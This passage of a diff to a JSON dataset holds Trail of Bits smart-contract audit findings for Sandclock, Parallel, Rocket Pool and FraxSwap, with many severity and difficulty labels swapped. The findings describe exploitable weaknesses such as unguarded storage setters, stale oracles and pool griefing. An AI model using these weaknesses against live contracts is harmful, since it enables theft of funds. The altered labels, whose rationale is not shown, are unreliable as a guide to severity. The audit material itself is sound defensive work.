usdcToEthPriceFeed.latestRoundData(); return _ethAmount.divWadDown( uint256 (usdcPriceInEth) * C.WETH_USDC_DECIMALS_DIFF); } Figure 6.1: All returned data other than the answer value is ignored during the call to a Chainlink feed's latestRoundData method. ( sandclock-contracts/src/steth/PriceConverter.sol#L67-L71 ) According to the Chainlink documentation , if the latestRoundData() function is used, the updatedAt value should be checked to ensure that the returned value is recent enough for the application. Similarly, the LUSD/ETH price feed used by the scLiquity vault is an intermediate contract that calls the deprecated latestAnswer method on upstream Chainlink oracles. contract LSUDUsdToLUSDEth is IPriceFeed { IPriceFeed public constant LUSD_USD = IPriceFeed( 0x3D7aE7E594f2f2091Ad8798313450130d0Aba3a0 ); IPriceFeed public constant ETH_USD = IPriceFeed( 0x5f4eC3Df9cbd43714FE2740f5E3616155c5b8419 ); function latestAnswer () external view override returns ( int256 ) { return (LUSD_USD.latestAnswer() * 1 ether) / ETH_USD.latestAnswer(); } } Figure 6.2: The custom latestAnswer method in 0x60c0b047133f696334a2b7f68af0b49d2F3D4F72#code#L19 The Chainlink API reference flags the latestAnswer method as (Deprecated - Do not use this function.).
Note that the upstream IPriceFeed contracts called by the intermediate LSUDUsdToLUSDEth contract are upgradeable proxies. It is possible that the implementations will be updated to remove support for the deprecated latestAnswer method, breaking the scLiquity vault's lusd2eth price feed. Because the oracle price feeds are used for calculating the slippage tolerance, a difference may exist between the oracle price and the DEX pool spot price, either due to price update delays or normal price fluctuations or because the feed has become stale. This could lead to two possible adverse scenarios: If the oracle price is significantly higher than the pool price, the slippage tolerance could be too loose, introducing the possibility of an MEV sandwich attack that can profit on the excess. If the oracle price is significantly lower than the pool price, the slippage tolerance could be too tight, and the transaction will always revert. Users will perceive this as a denial of service because they would not be able to interact with the protocol until the price difference is settled. Exploit Scenario Bob has assets invested in a scWETHv2 vault and wants to withdraw part of his assets. He interacts with the contracts, and every withdrawal transaction he submits reverts due to a large difference between the oracle and pool prices, leading to failed slippage checks. This results in a waste of gas and leaves Bob confused, as there is no clear indication of where the problem lies. Recommendations Short term, make sure that the oracles report up-to-date data, and replace the external LUSD/ETH oracle with one that supports verification of the latest update timestamp. In the case of stale oracle data, pause price-dependent Sandclock functionality until the oracle comes back online or the admin replaces it with a live oracle. Long term, review the documentation for Chainlink and other oracle integrations to ensure that all of the security requirements are met to avoid potential issues, and add tests that take these possible situations into account. A. Vulnerability Categories The following tables describe the vulnerability categories, severity levels, and difficulty levels used in this document. Vulnerability Categories Category", + "labels": [ + "Trail of Bits", + "Severity: Informational", + "Difficulty: High" ] }, { @@ -946,7 +956,7 @@ "labels": [ "Trail of Bits", "Severity: Medium", - "Difficulty: Medium" + "Difficulty: Low" ] }, { @@ -955,7 +965,7 @@ "body": "The Pallet::force_update_market method can be used to replace the stored market instance for a given asset. Other methods used to update market parameters perform extensive validation of the market parameters, but force_update_market checks only the rate model. pub fn force_update_market ( origin: OriginFor<T> , asset_id: AssetIdOf<T> , market: Market<BalanceOf<T>>, ) -> DispatchResultWithPostInfo { T::UpdateOrigin::ensure_origin(origin)?; ensure!( market.rate_model.check_model(), Error::<T>::InvalidRateModelParam ); let updated_market = Self ::mutate_market(asset_id, |stored_market| { *stored_market = market; stored_market.clone() })?; Self ::deposit_event(Event::<T>::UpdatedMarket(updated_market)); Ok (().into()) } Figure 3.1: pallets/loans/src/lib.rs:539-556 This means that the caller (who is either the root account or half of the general council) could inadvertently change immutable market parameters like ptoken_id. Exploit Scenario The root account calls force_update_market to update a set of market parameters.
By mistake, the ptoken_id market parameter is updated, which means that Pallet::ptoken_id and Pallet::underlying_id are no longer inverses. Recommendations Short term, consider adding more input validation to the force_update_market extrinsic. In particular, it may make sense to ensure that the ptoken_id market parameter has not changed. Alternatively, add validation to check whether the ptoken_id market parameter is updated and to update the UnderlyingAssetId map to ensure that the value matches the Markets storage map.", "labels": [ "Trail of Bits", - "Severity: High", + "Severity: Informational", "Difficulty: High" ] }, @@ -965,7 +975,7 @@ "body": "The staking ledger is used to keep track of the total amount of staked funds in the system. It is updated in response to cross-consensus messaging (XCM) requests to the parent chain (either Polkadot or Kusama). A number of the StakingLedger methods lack sufficient input validation before they update the staking ledger's internal state. Even though the input is validated as part of the original XCM call, there could still be issues due to implementation errors or overlooked corner cases. First, the StakingLedger::rebond method does not use checked arithmetic to update the active balance. The method should also check that the computed unlocking_balance is equal to the input value at the end of the loop to ensure that the system remains consistent. pub fn rebond (& mut self , value: Balance ) { let mut unlocking_balance: Balance = Zero::zero(); while let Some (last) = self .unlocking.last_mut() { if unlocking_balance + last.value <= value { unlocking_balance += last.value; self .active += last.value; self .unlocking.pop(); } else { let diff = value - unlocking_balance; unlocking_balance += diff; self .active += diff; last.value -= diff; } if unlocking_balance >= value { break ; } } } Figure 4.1: pallets/liquid-staking/src/types.rs:199-219 Second, the StakingLedger::bond_extra method does not use checked arithmetic to update the total and active balances. pub fn bond_extra (& mut self , value: Balance ) { self .total += value; self .active += value; } Figure 4.2: pallets/liquid-staking/src/types.rs:223-226 Finally, the StakingLedger::unbond method does not use checked arithmetic when updating the active balance. pub fn unbond (& mut self , value: Balance , target_era: EraIndex ) { if let Some ( mut chunk) = self .unlocking .last_mut() .filter(|chunk| chunk.era == target_era) { // To keep the chunk count down, we only keep one chunk per era. Since // `unlocking` is a FIFO queue, if a chunk exists for `era` we know that // it will be the last one. chunk.value = chunk.value.saturating_add(value); } else { self .unlocking.push(UnlockChunk { value, era: target_era , }); }; // Skipped the minimum balance check because the platform will // bond `MinNominatorBond` to make sure: // 1. No chill call is needed // 2. No minimum balance check self .active -= value; } Figure 4.3: pallets/liquid-staking/src/types.rs:230-253 Since the staking ledger is updated by a number of the XCM response handlers, and XCM responses may return out of order, it is important to ensure that input to the staking ledger methods is validated to prevent issues due to race conditions and corner cases. We could not find a way to exploit this issue, but we cannot rule out the risk that it could be used to cause a denial-of-service condition in the system.
Exploit Scenario The staking ledger's state is updated as part of a WithdrawUnbonded request, leaving the unlocking vector in the staking ledger empty. Later, when the response to a previous call to rebond is handled, the ledger is updated again, which leaves it in an inconsistent state. Recommendations Short term, ensure that the balance represented by the staking ledger's unlocking vector is enough to cover the input balance passed to StakingLedger::rebond . Use checked arithmetic in all staking ledger methods that update the ledger's internal state to ensure that issues due to data races are detected and handled correctly.", "labels": [ "Trail of Bits", - "Severity: High", + "Severity: Undetermined", "Difficulty: High" ] }, @@ -975,8 +985,8 @@ "body": "When the liquid-staking pallet generates an XCM request for the parent chain, the corresponding XCM response triggers a call to Pallet::notification_received . If the response is of the Response::ExecutionResult type, this method calls Pallet::do_notification_received to handle the result. The Pallet::do_notification_received method checks whether the request was successful and then updates the local state according to the corresponding XCM request, which is obtained from the XcmRequests storage map. fn do_notification_received ( query_id: QueryId , request: XcmRequest , res: Option <( u32 , XcmError)>, ) -> DispatchResult { use ArithmeticKind::*; use XcmRequest::*; let executed = res.is_none(); if !executed { return Ok (()); } match request { Bond { index: derivative_index , amount, } => { ensure!( !StakingLedgers::<T>::contains_key(&derivative_index), Error::<T>::AlreadyBonded ); let staking_ledger = <StakingLedger<T::AccountId, BalanceOf<T>>>::new( Self ::derivative_sovereign_account_id(derivative_index), amount, ); StakingLedgers::<T>::insert(derivative_index, staking_ledger); MatchingPool::<T>::try_mutate(|p| -> DispatchResult { p.update_total_stake_amount(amount, Subtraction) })?; T::Assets::burn_from( Self ::staking_currency()?, & Self ::account_id(), amount )?; } // ... } XcmRequests::<T>::remove(&query_id); Ok (()) } Figure 5.1: pallets/liquid-staking/src/lib.rs:1071-1159 If the method completes without errors, the XCM request is removed from storage via a call to XcmRequests::remove(query_id) . However, if any of the following conditions are true, the corresponding XCM request is left in storage indefinitely: 1. The request fails and Pallet::do_notification_received exits early. 2. Pallet::do_notification_received fails. 3. The response type is not Response::ExecutionResult . These three cases are currently unhandled by the codebase. The same issue is present in the crowdloans pallet implementation of Pallet::do_notification_received . Recommendations Short term, ensure that failed XCM requests are handled correctly by the crowdloans and liquid-staking pallets.", "labels": [ "Trail of Bits", - "Severity: Informational", - "Difficulty: Low" + "Severity: Low", + "Difficulty: High" ] }, { "body": "The loans pallet uses oracle prices to find a USD value of assets using the get_price function (figure 6.1). The get_price function internally uses the T::PriceFeeder::get_price function, which returns a timestamp and the price. However, the returned timestamp is ignored.
pub fn get_price (asset_id: AssetIdOf<T> ) -> Result { let (price, _) = T::PriceFeeder::get_price(&asset_id) .ok_or(Error::<T>::PriceOracleNotReady)?; if price.is_zero() { return Err (Error::<T>::PriceIsZero.into()); } log::trace!( target: \"loans::get_price\" , \"price: {:?}\" , price.into_inner() ); Ok (price) } Figure 6.1: pallets/loans/src/lib.rs: 1430-1441 Exploit Scenario The price feeding oracles fail to deliver prices for an extended period of time. The get_price function returns stale prices, causing the get_asset_value function to return a non-market asset value. Recommendations Short term, modify the code so that it compares the returned timestamp from the T::PriceFeeder::get_price function with the current timestamp, returns an error if the price is too old, and handles the emergency price, which currently has a timestamp of zero. This will stop the market if stale prices are returned and allow the governance process to intervene with an emergency price.", "labels": [ "Trail of Bits", - "Severity: High", - "Difficulty: Low" + "Severity: Low", + "Difficulty: High" ] }, { "body": "The claim extrinsic in the crowdloans pallet is missing code to subtract the claimed amount from vault.contributed to update the total contribution amount (figure 7.1). A similar bug exists in the refund extrinsic: there is no subtraction from vault.contributed after the Self::contribution_kill call. pub fn claim ( origin: OriginFor<T> , crowdloan: ParaId , lease_start: LeasePeriod , lease_end: LeasePeriod , ) -> DispatchResult { // ... Self ::contribution_kill( vault.trie_index, &who, ChildStorageKind::Contributed ); Self ::deposit_event(Event::<T>::VaultClaimed( crowdloan, (lease_start, lease_end), ctoken, who, amount, VaultPhase::Succeeded, )); Ok (()) } Figure 7.1: pallets/crowdloans/src/lib.rs: 718- Exploit Scenario The claim extrinsic is called, but the total amount in vault.contributed is not updated, leading to incorrect calculations in other places. Recommendations Short term, update the claim and refund extrinsics so that they subtract the amount from vault.contributed . Long term, add a test suite to ensure that the vault state stays consistent after the claim and refund extrinsics are called.", "labels": [ "Trail of Bits", - "Severity: Medium", - "Difficulty: Medium" + "Severity: Undetermined", + "Difficulty: High" ] }, { "labels": [ "Trail of Bits", "Severity: Informational", - "Difficulty: Low" + "Difficulty: High" ] }, { "body": "The referral code is used in a number of extrinsic calls in the crowdloans pallet. Because the referral code is never validated, it can be a sequence of arbitrary bytes. The referral code is logged by a number of extrinsics. However, it is currently impossible to perform log injection because the referral code is printed as a hexadecimal string rather than raw bytes (using the debug representation). pub fn contribute ( origin: OriginFor<T> , crowdloan: ParaId , #[pallet::compact] amount: BalanceOf<T> , referral_code: Vec < u8 > , ) -> DispatchResultWithPostInfo { // ... log::trace!( target: \"crowdloans::contribute\" , \"who: {:?}, para_id: {:?}, amount: {:?}, referral_code: {:?}\" , &who, &crowdloan, &amount, &referral_code ); Ok (().into()) } Figure 9.1: pallets/crowdloans/src/lib.rs: 502-594 Exploit Scenario The referral code is rendered as raw bytes in a vulnerable environment, introducing an opportunity to perform a log injection attack.
Recommendations Short term, choose and implement a data type that models the referral code semantics as closely as possible.", "labels": [ "Trail of Bits", - "Severity: Medium", - "Difficulty: Medium" + "Severity: Informational", + "Difficulty: High" ] }, { "labels": [ "Trail of Bits", "Severity: Informational", - "Difficulty: Undetermined" + "Difficulty: High" ] }, { "body": "The RocketStorage contract uses the eternal storage pattern. The contract is a key-value store that all protocol contracts can write to and read. However, RocketStorage has a special protected storage area that should not be writable by network contracts (figure 1.1); it should be writable only by node operators under specific conditions. This area stores data related to node operators' withdrawal addresses and is critical to the security of their assets. // Protected storage (not accessible by network contracts) mapping(address => address) private withdrawalAddresses; mapping(address => address) private pendingWithdrawalAddresses; Figure 1.1: Protected storage in the RocketStorage contract (RocketStorage.sol#L24-L26) RocketStorage also has a number of setters for types that fit into a single storage slot. These setters are implemented by the raw sstore opcode (figure 1.2) and can be used to set any storage slot to any value. They can be called by any network contract, and the caller will have full control of storage slots and values. function setUint(bytes32 _key, uint _value) onlyLatestRocketNetworkContract override external { assembly { sstore (_key, _value) } } Figure 1.2: An example of a setter that uses sstore in the RocketStorage contract (RocketStorage.sol#L205-209) As a result, all network contracts can write to all storage slots in the RocketStorage contract, including those in the protected area. There are three setters that can set any storage slot to any value under any condition: setUint, setInt, and setBytes32. The addUint setter can be used if the unsigned integer representation of the value is larger than the current value; subUint can be used if it is smaller. Other setters such as setAddress and setBool can be used to set a portion of a storage slot to a value; the rest of the storage slot is zeroed out. However, they can still be used to delete any storage slot. In addition to undermining the security of the protected storage areas, these direct storage-slot setters make the code vulnerable to accidental storage-slot clashes. The burden of ensuring security is placed on the caller, who must pass in a properly hashed key. A bug could easily lead to the overwriting of the guardian, for example. Exploit Scenario Alice, a node operator, trusts Rocket Pool's guarantee that her deposit will be protected even if other parts of the protocol are compromised. Attacker Charlie upgrades a contract that has write access to RocketStorage to a malicious version. Charlie then computes the storage slot of each node operator's withdrawal address, including Alice's, and calls rocketStorage.setUint(slot, charliesAddress) from the malicious contract. He can then trigger withdrawals and steal node operators' funds. Recommendations Short term, remove all sstore operations from the RocketStorage contract. Use mappings, which are already used for strings and bytes, for all types.
When using mappings, each value is stored in a slot that is computed from the hash of the mapping slot and the key, making it impossible for a user to write from one mapping into another unless that user finds a hash collision. Mappings will ensure proper separation of the protected storage areas. Strongly consider moving the protected storage areas and related operations into a separate immutable contract. This would make it much easier to check the access controls on the protected storage areas. Long term, avoid using assembly whenever possible. Ensure that assembly operations such as sstore do not enable the circumvention of access controls.", "labels": [ "Trail of Bits", - "Severity: Medium", + "Severity: High", "Difficulty: High" ] }, { "body": "As mentioned in TOB-ROCKET-001, the RocketStorage contract uses the eternal storage pattern. This pattern uses assembly to read and write to raw storage slots. Most of the system's data is stored in this manner, which is shown in figures 2.1 and 2.2. function setInt(bytes32 _key, int _value) onlyLatestRocketNetworkContract override external { assembly { sstore (_key, _value) } } Figure 2.1: RocketStorage.sol#L229-L233 function getUint(bytes32 _key) override external view returns (uint256 r) { assembly { r := sload (_key) } } Figure 2.2: RocketStorage.sol#L159-L163 If the same storage slot were used to write a value of type T and then to read a value of type U from the same slot, the value of U could be unexpected. Since storage is untyped, Solidity's type checker would be unable to catch this type mismatch, and the bug would go unnoticed. Exploit Scenario A codebase update causes one storage slot, S, to be used with two different data types. The compiler does not throw any errors, and the code is deployed. During transaction processing, an integer, -1, is written to S. Later, S is read and interpreted as an unsigned integer. Subsequent calculations use the maximum uint value, causing users to lose funds. Recommendations Short term, remove the assembly code and raw storage mapping from the codebase. Use a mapping for each type to ensure that each slot of the mapping stores values of the same type. Long term, avoid using assembly whenever possible. Use Solidity as a high-level language so that its built-in type checker will detect type errors.", "labels": [ "Trail of Bits", - "Severity: Medium", + "Severity: High", "Difficulty: High" ] }, { "labels": [ "Trail of Bits", "Severity: Informational", - "Difficulty: Undetermined" + "Difficulty: High" ] }, { "body": "At the beginning of this audit, the Rocket Pool team mentioned an important invariant: if a node operator is allowed to withdraw funds from a minipool, the withdrawal should always succeed. This invariant is meant to assure node operators that they will be able to withdraw their funds even if the system's governance upgrades network contracts to malicious versions. To withdraw funds from a minipool, a node operator calls the close or refund function, depending on the state of the minipool. The close function calls rocketMinipoolManager.destroyMinipool. The rocketMinipoolManager contract can be upgraded by governance, which could replace it with a version in which destroyMinipool reverts. This would cause withdrawals to revert, breaking the guarantee mentioned above. The refund function does not call any network contracts. However, the refund function cannot be used to retrieve all of the funds that close can retrieve.
Governance could also tamper with the withdrawal process by altering node operators' withdrawal addresses. (See TOB-ROCKET-001 for more details.) Exploit Scenario Alice, a node operator, owns a dissolved minipool and decides to withdraw her funds. However, before Alice calls close() on her minipool to withdraw her funds, governance upgrades the RocketMinipoolManager contract to a version in which calls to destroyMinipool fail. As a result, the close() function's call to RocketMinipoolManager.destroyMinipool fails, and Alice is unable to withdraw her funds. Recommendations Short term, use Solidity's try/catch statement to ensure that withdrawal functions that should always succeed are not affected by function failures in other network contracts. Additionally, ensure that no important data validation occurs in functions whose failures are ignored. Long term, carefully examine the process through which node operators execute withdrawals and ensure that their withdrawals cannot be blocked by other network contracts.", "labels": [ "Trail of Bits", - "Severity: Medium", - "Difficulty: Medium" + "Severity: High", + "Difficulty: High" ] }, { "labels": [ "Trail of Bits", "Severity: High", - "Difficulty: Low" + "Difficulty: High" ] }, { "body": "Many parts of the Rocket Pool codebase that access its eternal storage compute storage locations inline, which means that these computations are duplicated throughout the codebase. Many string constants appear in the codebase several times; these include minipool.exists (shown in figure 7.1), which appears four times. Duplication of the same piece of information in many parts of a codebase increases the risk of inconsistencies. Furthermore, because the code lacks existence and type checks for these strings, inconsistencies introduced into a contract by developer error may not be detected unless the contract starts behaving in unexpected ways. setBool(keccak256(abi.encodePacked(\"minipool.exists\", contractAddress)), true); Figure 7.1: RocketMinipoolManager.sol#L216 Many storage-slot computations take parameters. However, there are no checks on the types or number of the parameters that they take, and incorrect parameter values will not be caught by the Solidity compiler. Exploit Scenario Bob, a developer, adds a functionality that sets the network.prices.submitted.node.key string constant. He ABI-encodes the node address, block, and RPL price arguments but forgets to ABI-encode the effective RPL stake amount. The code then sets an entirely new storage slot that is not read anywhere else. As a result, the write operation is a no-op with undefined consequences. Recommendations Short term, extract the computation of storage slots into helper functions (like that shown in 7.2). This will ensure that each string constant exists only in a single place, removing the potential for inconsistencies. These functions can also check the types of the parameters used in storage-slot computations.
function contractExistsSlot(address contractAddress) external pure returns (bytes32) { return keccak256(abi.encodePacked(\"contract.exists\", contractAddress)); } // _getBool(keccak256(abi.encodePacked(\"contract.exists\", msg.sender))) _getBool(contractExistsSlot(msg.sender)) // setBool(keccak256(abi.encodePacked(\"contract.exists\", _contractAddress)), true) setBool(contractExistsSlot(_contractAddress), true) Figure 7.2: An example of a helper function Long term, replace the raw setters and getters in RocketBase (e.g., setAddress) with setters and getters for specific values (e.g., the setContractExists setter) and restrict RocketStorage access to these setters.", "labels": [ "Trail of Bits", - "Severity: High", - "Difficulty: Low" + "Severity: Informational", + "Difficulty: Medium" ] }, { "body": "The Rocket Pool code uses eternal storage to store many named mappings. A named mapping is one that is identified by a string (such as minipool.exists) and maps a key (like contractAddress in figure 8.1) to a value. setBool(keccak256(abi.encodePacked(\"minipool.exists\", contractAddress)), true); Figure 8.1: RocketMinipoolManager.sol#L216 Given a mapping whose state variable appears at index N in the code, Solidity stores the value associated with key at a slot that is computed as follows: h = type(key) == string || type(key) == bytes ? keccak256 : left_pad_to_32_bytes slot = keccak256(abi.encodePacked(h(key), N)) Figure 8.2: Pseudocode of the Solidity computation of a mapping's storage slot The first item in a Rocket Pool mapping is the identifier, which could enable an attacker to write values into a mapping that should be inaccessible to the attacker. We set the severity of this issue to informational because such an attack does not currently appear to be possible. Exploit Scenario Mapping A stores its state variable at slot n. Rocket Pool developers introduce new code, making it possible for an attacker to change the second argument to abi.encodePacked in the setBool setter (shown in figure 8.1). The attacker passes in a first argument of 32 bytes and can then pass in n as the second argument and set an entry in Mapping A. Recommendations Short term, switch the order of arguments such that a mapping's identifier is the last argument and the key (or keys) is the first (as in keccak256(key, unique_identifier_of_mapping)). Long term, carefully examine all raw storage operations and ensure that they cannot be used by attackers to access storage locations that should be inaccessible to them. A. Vulnerability Categories The following tables describe the vulnerability categories, severity levels, and difficulty levels used in this document. Vulnerability Categories Category", "labels": [ "Trail of Bits", - "Severity: Undetermined", - "Difficulty: Medium" + "Severity: Informational", + "Difficulty: High" ] }, { "body": "FraxSwap's use of rebasing tokens (tokens whose supply can be adjusted to control their prices) could cause transactions to revert after users cancel or withdraw from long-term swaps. FraxSwap offers a new type of swap called a long-term swap, which executes certain swaps over an extended period of time. Users can cancel or withdraw from long-term swaps and recover all of their purchased and unsold tokens.
///@notice stop the execution of a long term order function cancelLongTermSwap(uint256 orderId) external lock execVirtualOrders { (address sellToken, uint256 unsoldAmount, address buyToken, uint256 purchasedAmount) = longTermOrders.cancelLongTermSwap(orderId); bool buyToken0 = buyToken == token0; twammReserve0 -= uint112(buyToken0 ? purchasedAmount : unsoldAmount); twammReserve1 -= uint112(buyToken0 ? unsoldAmount : purchasedAmount); // transfer to owner of order _safeTransfer(buyToken, msg.sender, purchasedAmount); _safeTransfer(sellToken, msg.sender, unsoldAmount); // update order. Used for tracking / informational longTermOrders.orderMap[orderId].isComplete = true; emit CancelLongTermOrder(msg.sender, orderId, sellToken, unsoldAmount, buyToken, purchasedAmount); } Figure 1.1: The cancelLongTermSwap function in the UniV2TWAMMPair contract However, if a rebasing token is used in a long-term swap, the balance of the UniV2TWAMMPair contract could increase or decrease over time. Such changes in the contract's balance could result in unintended effects when users try to cancel or withdraw from long-term swaps. For example, because all long-term swaps for a pair are processed as part of any function with the execVirtualOrders modifier, if the actual balance of the UniV2TWAMMPair is reduced as part of one or more rebases in the underlying token, this balance will not be reflected correctly in the contract's internal accounting, and cancel and withdraw operations will transfer too many tokens to users. Eventually, this will exhaust the contract's balance of the token before all users are able to withdraw, causing these transactions to revert. Exploit Scenario Alice creates a long-term swap; one of the tokens to be swapped is a rebasing token. After some time, the token's supply is adjusted, causing the balance of UniV2TWAMMPair to decrease. Alice tries to cancel the long-term swap, but the internal bookkeeping for her swap was not updated to reflect the rebase, causing the token transfer from the contract to Alice to revert and blocking her other token transfers from completing. To allow Alice to access funds and to allow subsequent transactions to succeed, some tokens need to be explicitly sent to the UniV2TWAMMPair contract to increase its balance. Recommendations Short term, explicitly document issues involving rebasing tokens and long-term swaps to ensure that users are aware of them. Long term, evaluate the security risks surrounding ERC20 tokens and how they could affect every system component. References Common errors with rebasing tokens on Uniswap V2", "labels": [ "Trail of Bits", - "Severity: Medium", - "Difficulty: Medium" + "Severity: High", + "Difficulty: High" ] }, { "body": "When a long-term swap is submitted to a UniV2TWAMMPair instance, the code performs checks, such as those ensuring that the selling rate of a given token is nonzero, before the order is recorded. However, the code does not validate the existing reserves for the tokens being bought in long-term swaps.
///@notice adds long term swap to order pool function performLongTermSwap(LongTermOrders storage longTermOrders, address from, address to, uint256 amount, uint256 numberOfTimeIntervals) private returns (uint256) { // make sure to update virtual order state (before calling this function) //determine the selling rate based on number of blocks to expiry and total amount uint256 currentTime = block.timestamp; uint256 lastExpiryTimestamp = currentTime - (currentTime % longTermOrders.orderTimeInterval); uint256 orderExpiry = longTermOrders.orderTimeInterval * (numberOfTimeIntervals + 1) + lastExpiryTimestamp; uint256 sellingRate = SELL_RATE_ADDITIONAL_PRECISION * amount / (orderExpiry - currentTime); require(sellingRate > 0); // tokenRate cannot be zero Figure 2.1: Uniswap_V2_TWAMM/twamm/LongTermOrders.sol#L118-L128 If a long-term swap is submitted before adequate liquidity has been added to the pool, the next pool operation will attempt to trade against inadequate liquidity, resulting in a division-by-zero error in the line highlighted in blue in figure 2.2. As a result, all pool operations will revert until the number of tokens needed to begin executing the virtual swap are added. ///@notice computes the result of virtual trades by the token pools function computeVirtualBalances( uint256 token0Start, uint256 token1Start, uint256 token0In, uint256 token1In) internal pure returns (uint256 token0Out, uint256 token1Out, uint256 ammEndToken0, uint256 ammEndToken1) { token0Out = 0; token1Out = 0; //when both pools sell, we use the TWAMM formula else { uint256 aIn = token0In * 997 / 1000; uint256 bIn = token1In * 997 / 1000; uint256 k = token0Start * token1Start; ammEndToken1 = token0Start * (token1Start + bIn) / (token0Start + aIn); ammEndToken0 = k / ammEndToken1; token0Out = token0Start + aIn - ammEndToken0; token1Out = token1Start + bIn - ammEndToken1; } Figure 2.2: Uniswap_V2_TWAMM/twamm/ExecVirtualOrders.sol#L39-L78 The long-term swap functionality can be paused by the contract owner (e.g., to prevent long-term swaps when a pool has inadequate liquidity); however, by default, the functionality is enabled when a new pool is deployed. An attacker could exploit this fact to grief a newly deployed pool by submitting long-term swaps early in its lifecycle when it has minimal liquidity. Additionally, even if a newly deployed pool is already loaded with adequate liquidity, a user could submit long-term swaps with zero intervals to trigger an integer underflow in the line highlighted in red in figure 2.2. However, note that the user would have to submit at least one long-term swap that requires more than the total liquidity in the reserve: testSync(): failed! Call sequence: initialize(6809753114178753104760,5497681857357274469621,837982930770660231771 7,10991961728915299510446) longTermSwapFrom1To0(2,0) testLongTermSwapFrom0To1(23416246225666705882600004967801889944504351201487667 6541160061227714669,0) testSync() Time delay: 37073 seconds Block delay: 48 Figure 2.3: The Echidna output that triggers a revert in a call to sync() Exploit Scenario A new FraxSwap pool is deployed, causing the long-term swap functionality to be unpaused. Before users have a chance to add sufficient liquidity to the pool, Eve initiates long-term swaps in both directions. Since there are no tokens available to purchase, all pool operations revert, and the provided tokens are trapped. At this point, adding more liquidity is not possible since doing so also triggers the long-term swap computation, forcing a revert.
Recommendations Short term, disable new swaps and remove all the liquidity in the deployed contracts. Modify the code so that, moving forward, liquidity can be added without executing long-term swaps. Document the pool state requirements before long-term swaps can be enabled. Long term, use extensive smart contract fuzzing to test that important operations cannot be blocked.", "labels": [ "Trail of Bits", - "Severity: Undetermined", - "Difficulty: Medium" + "Severity: High", + "Difficulty: High" ] }, { "body": "An insufficient number of events is declared in the Frax Finance contracts. As a result, malfunctioning contracts or malicious attacks may not be noticed. For instance, long-term swaps are executed in batches by the executeVirtualOrdersUntilTimestamp function: ///@notice executes all virtual orders until blockTimestamp is reached. function executeVirtualOrdersUntilTimestamp(LongTermOrders storage longTermOrders, uint256 blockTimestamp, ExecuteVirtualOrdersResult memory reserveResult) internal { uint256 nextExpiryBlockTimestamp = longTermOrders.lastVirtualOrderTimestamp - (longTermOrders.lastVirtualOrderTimestamp % longTermOrders.orderTimeInterval) + longTermOrders.orderTimeInterval; //iterate through time intervals eligible for order expiries, moving state forward OrderPool storage orderPool0 = longTermOrders.OrderPool0; OrderPool storage orderPool1 = longTermOrders.OrderPool1; while (nextExpiryBlockTimestamp < blockTimestamp) { // Optimization for skipping blocks with no expiry if (orderPool0.salesRateEndingPerTimeInterval[nextExpiryBlockTimestamp] > 0 || orderPool1.salesRateEndingPerTimeInterval[nextExpiryBlockTimestamp] > 0) { //amount sold from virtual trades uint256 blockTimestampElapsed = nextExpiryBlockTimestamp - longTermOrders.lastVirtualOrderTimestamp; uint256 token0SellAmount = orderPool0.currentSalesRate * blockTimestampElapsed / SELL_RATE_ADDITIONAL_PRECISION; uint256 token1SellAmount = orderPool1.currentSalesRate * blockTimestampElapsed / SELL_RATE_ADDITIONAL_PRECISION; (uint256 token0Out, uint256 token1Out) = executeVirtualTradesAndOrderExpiries(reserveResult, token0SellAmount, token1SellAmount); updateOrderPoolAfterExecution(longTermOrders, orderPool0, orderPool1, token0Out, token1Out, nextExpiryBlockTimestamp); } nextExpiryBlockTimestamp += longTermOrders.orderTimeInterval; } //finally, move state to current blockTimestamp if necessary if (longTermOrders.lastVirtualOrderTimestamp != blockTimestamp) { //amount sold from virtual trades uint256 blockTimestampElapsed = blockTimestamp - longTermOrders.lastVirtualOrderTimestamp; uint256 token0SellAmount = orderPool0.currentSalesRate * blockTimestampElapsed / SELL_RATE_ADDITIONAL_PRECISION; uint256 token1SellAmount = orderPool1.currentSalesRate * blockTimestampElapsed / SELL_RATE_ADDITIONAL_PRECISION; (uint256 token0Out, uint256 token1Out) = executeVirtualTradesAndOrderExpiries(reserveResult, token0SellAmount, token1SellAmount); updateOrderPoolAfterExecution(longTermOrders, orderPool0, orderPool1, token0Out, token1Out, blockTimestamp); } } Figure 3.1: Uniswap_V2_TWAMM/twamm/LongTermOrders.sol#L216-L252 However, despite the complexity of this function, it does not emit any events; it will be difficult to monitor issues that may arise whenever the function is executed.
Additionally, important operations in the FPIControllerPool and CPITrackerOracle contracts do not emit any events: function toggleMints() external onlyByOwnGov { mints_paused = !mints_paused; } function toggleRedeems() external onlyByOwnGov { redeems_paused = !redeems_paused; } function setFraxBorrowCap(int256 _frax_borrow_cap) external onlyByOwnGov { frax_borrow_cap = _frax_borrow_cap; } function setMintCap(uint256 _fpi_mint_cap) external onlyByOwnGov { fpi_mint_cap = _fpi_mint_cap; } Figure 3.2: FPI/FPIControllerPool.sol#L528-L542 Events generated during contract execution aid in monitoring, baselining of behavior, and detection of suspicious activity. Without events, users and blockchain-monitoring systems cannot easily detect behavior that falls outside the baseline conditions, and it will be difficult to review the correct behavior of the contracts once they have been deployed. Exploit Scenario Eve, a malicious user, discovers a vulnerability that allows her to manipulate long-term swaps. Because no events are generated from her actions, the attack goes unnoticed. Eve uses her exploit to drain liquidity or prevent other users from swapping before the Frax Finance team has a chance to respond. Recommendations Short term, emit events for all operations that may contribute to a higher level of monitoring and alerting, even internal ones. Long term, consider using a blockchain-monitoring system to track any suspicious behavior in the contracts. A monitoring mechanism for critical events could quickly detect system compromises.", "labels": [ "Trail of Bits", - "Severity: High", + "Severity: Low", "Difficulty: Low" ] }, { "body": "Explicit integer conversions can be used to bypass certain restrictions (e.g., the borrowing cap) in the FPIControllerPool contract. The FPIControllerPool contract allows certain users to either borrow or repay FRAX within certain limits (e.g., the borrowing cap): // Lend the FRAX collateral to an AMO function giveFRAXToAMO(address destination_amo, uint256 frax_amount) external onlyByOwnGov validAMO(destination_amo) { int256 frax_amount_i256 = int256(frax_amount); // Update the balances first require((frax_borrowed_sum + frax_amount_i256) <= frax_borrow_cap, \"Borrow cap\"); frax_borrowed_balances[destination_amo] += frax_amount_i256; frax_borrowed_sum += frax_amount_i256; // Give the FRAX to the AMO TransferHelper.safeTransfer(address(FRAX), destination_amo, frax_amount); } // AMO gives back FRAX. Needed for proper accounting function receiveFRAXFromAMO(uint256 frax_amount) external validAMO(msg.sender) { int256 frax_amt_i256 = int256(frax_amount); // Give back first TransferHelper.safeTransferFrom(address(FRAX), msg.sender, address(this), frax_amount); // Then update the balances frax_borrowed_balances[msg.sender] -= frax_amt_i256; frax_borrowed_sum -= frax_amt_i256; } Figure 4.1: The 